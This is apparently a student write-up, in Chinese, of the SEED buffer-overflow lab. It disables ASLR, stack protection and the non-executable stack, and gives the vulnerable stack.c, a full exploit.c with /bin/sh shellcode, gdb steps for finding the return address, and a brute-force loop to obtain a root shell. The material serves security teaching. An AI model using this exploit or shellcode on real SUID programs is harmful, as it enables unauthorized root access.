SEED实验:缓冲区溢出漏洞实验__网络攻防实验

一、实验描述

(实验描述属于概况了解,详见实验步骤)
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制，甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭，溢出会引起返回地址被重写。
缓冲区溢出攻击是危害最大的攻击方式之一。为 了防止缓冲区溢出攻击，已经研究出了多种保护 机制，比较常用的有：地址空间随机化、禁止栈 执行、“Stack Guard”三种。为了演示缓冲区溢出 攻击的原理，我们将禁用这些机制。本次实验在 ubuntu虚拟机下运行。
禁止一些安全机制
(1)禁止|允许 地址空间随机化机制
• sudo su
• dees
• /sbin/sysctl -w kernel.randomize_va_space=0|1
• 或sudo /sbin/sysctl -w kernel.randomize_va_space=0|1
(2)允许或禁止栈执行
• 在编译c程序代码时设置
• 允许：gcc -z execstack -o test test.c
• 禁止：gcc -z noexecstack -o test test.c
(3)关闭gcc的Stack Guard
• gcc -fno-stack-protector -o test test.c

二、实验内容

在seed-ubuntu-12.04 环境下，利用缓冲区溢出漏洞对用程序进行攻击，从而在其中执行shellcode 达到获取shell 权限的目的。整个实验环境会给出一个stack.c 程序和一个exploit.c 程序。
其中，前者stack.c是具有缓冲区溢出漏洞的用户程序，它会从文件中读取数据，并拷贝至自己的缓冲区。后者exploit.c则是需要攻击者精心设计的攻击程序，它会利用用户程序的漏洞产生badfile 文件，从而使用户程序读取badfile 时，被攻击者控制。在实验过程中需要开启可执行栈选项和关闭地址随机化选项，从而更容易定位到栈的地址
下载链接:
seed-ubuntu-12.04:
http://www.cis.syr.edu/~wedu/seed/lab_env.html
stack.c exploit.c call_shellcode.c:
http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/

三、实验任务

Task 1: Exploiting the Vulnerability
任务一的任务是通过修改攻击程序，向攻击程序生成的badfile中写入适当的地址覆盖被攻击程序的返回地址，使其转向攻击者想要运行的一段代码来达到攻击的目的。

实验步骤:

• 1.1初始设置:

  Ubuntu和其他一些Linux系统中，使用地址空间随机化来随机堆（heap）和栈（stack）的初始地址，这使得猜测准确的内存地址变得十分困难，而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中，我们使用以下命令关闭这一功能：

sudo sysctl -w kernel.randomize_va_space=0

此外，为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击，许多shell程序在被调用时自动放弃它们的特权。因此，即使你能欺骗一个Set-UID程序调用一个shell，也不能在这个shell中保持root权限，这个防护措施在/bin/bash中实现。

linux系统中，/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形，我们使用另一个shell程序（zsh）代替/bin/bash。下面的指令描述了如何设置zsh程序：

sudo su
cd /bin
rm sh
ln -s zsh sh

• 1.2漏洞程序

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include 
#include 
#include 

int bof(char *str)
{
char buffer[12];//和原程序不一样的地方在此处,如果没有修改,最终结果会是return properly 无法攻击成功.获得root权限

/* The following statement has a buffer overflow problem */
strcpy(buffer, str);

return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

通过代码可以知道，程序会读取一个名为“badfile”的文件，并将文件内容装入“buffer”。

编译该程序，并设置SET-UID。命令如下(以下命令是在root用户权限下执行的)：下面命令不执行或者没有在root用户权限下执行都会导致攻击失败

gcc -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack

GCC编译器有一种栈保护机制来阻止缓冲区溢出，所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制。

而 -z execstack 用于允许执行栈。

• 1.3攻击程序

我们的目的是攻击刚才的漏洞程序，并通过攻击获得root权限。
把以下代码保存为“exploit.c”文件，保存到 和stack.c同一目录下。代码如下：

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include 
#include 
#include 

char shellcode[]=

"\x31\xc0"    //xorl %eax,%eax
"\x50"        //pushl %eax
"\x68""//sh"  //pushl $0x68732f2f
"\x68""/bin"  //pushl $0x6e69622f
"\x89\xe3"    //movl %esp,%ebx
"\x50"        //pushl %eax
"\x53"        //pushl %ebx
"\x89\xe1"    //movl %esp,%ecx
"\x99"        //cdq
"\xb0\x0b"    //movb $0x0b,%al
"\xcd\x80"    //int $0x80
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */
strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");
strcpy(buffer+100,shellcode);

/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

注意上面的代码，“\x??\x??\x??\x??”处需要添上shellcode保存在内存中的地址，因为发生溢出后这个位置刚好可以覆盖返回地址。

而 strcpy(buffer+100,shellcode); 这一句又告诉我们，shellcode保存在 buffer+100 的位置。

现在我们要得到shellcode在内存中的地址，输入命令(这个命令在seed用户权限下执行,在root权限下和seed权限下求出的地址不一样,经过我的尝试,在Seed权限下执行这个命令,才能攻击成功)：

gdb stack

然后

 disass main

结果如下图:

执行下入所示的三个命令

 b *0x080484af//上图红线处
 r
 i r $esp

红框处得到的就是地址
根据语句 strcpy(buffer+100,shellcode); 我们计算shellcode的地址为 0xbffff150(十六进制)+100(十进制)=0xbffff1b4(十六进制)

现在修改exploit.c文件！将 \x??\x??\x??\x?? 修改为 \xb4\xf1\xff\xbf

然后，编译exploit.c程序(在seed下运行)：

gcc -o exploit exploit.c

• 3.4 攻击结果

可见，通过攻击，获得了root权限！
可能的错误
(1)如果不能攻击成功，提示”段错误“，那么请重新关掉地址随机化,使用gdb反汇编，计算内存地址。
(2)如果返回的结果是return propertly,可能是stack.c程序的缓冲区设置有误,改为12
(3)如果获得的不是#,而是$,是因为stack.c编译的时候没有在root下编译,并且没有修改编译后的stack的权限,即没有执行chmod u+s stack.

Task 2: Address Randomization
任务二的任务是将ubuntu的地址随机化选项开启，重新编译stack文件，运行时发现出现段错误。分析发现地址随机化是使进程的地址空间随机化，将进程的mmap基址，stack和vdso页面地址在每次运行时不固定。这样一来进程在运行时的地址将变得跟踪困难，并且攻击程序较难获得确切的地址来填入badfile使得跳转到自己攻击的shellcode代码。通过多次运行可以增加地址命中的概率但是也会相应地增加被发现的风险。

大致意思就是循环运行stack,直到攻击成功
实验步骤:

 sudo su
 /sbin/sysctl -w kernel.randomize_va_space=2
 sh -c "while [ 1 ]; do ./stack; done;"

此时会一直执行stack,可能一个小时两个小时….
如果等的不耐烦了,可以在另一个命令行里关闭地址随机化试试,立马能返回和task1一样的结果,获得root用户权限.